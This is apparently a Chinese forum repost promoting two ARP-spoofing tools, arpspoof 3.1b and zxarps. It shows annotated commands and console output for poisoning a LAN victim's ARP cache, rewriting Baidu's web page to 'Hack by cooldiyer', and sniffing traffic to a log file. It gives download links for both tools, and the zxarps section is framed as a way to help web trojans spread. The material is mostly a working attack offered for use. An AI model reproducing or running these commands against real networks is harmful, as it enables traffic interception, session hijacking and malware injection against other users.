arpspoof 3.1b
主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击
说明: 本程序公开源代码,为了换取更多朋友的指教
实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释)
效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
F:/arpspoof/Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定
F:/arpspoof/Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
[*] Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
[*] Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断
[*] Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
[*] Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*] Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”
[*] Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自动恢复受骗主机的ARP缓存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________
其它说明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存数据到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只显示数据
被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt
需要说的是程序在公网下照样使用,我已经解说过了,不再举例.........
规则文件的使用可以看程序的书写,本程序开放源代码
希望测试出更多Bug, 我努力更新。。
By CoolDiyer 2006-11-12
下载:http://allyesno.gbaopan.com/files/127df7d9d1ee441d9994959af8e24c21.gbp
zxarps
在当今网马横飞的日子,我帖个东东,让网马飞得更猛烈些吧
说明:
需要winPcap
基于arp欺骗,
具体功能看下面的使用说明~~~懒得打太多字了~~~
一些注意:
通常欺骗都是针对 网关和同网段下的其他机,所以-sethost [ip] 参数可以不填,
但如果同网段下有某server,而你想嗅探其他用户到该server的数据就要-sethost serverIP
Codz:
|
下载:http://allyesno.gbaopan.com/files/caef438cb81649dda7da376e515be0b7.gbp
再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow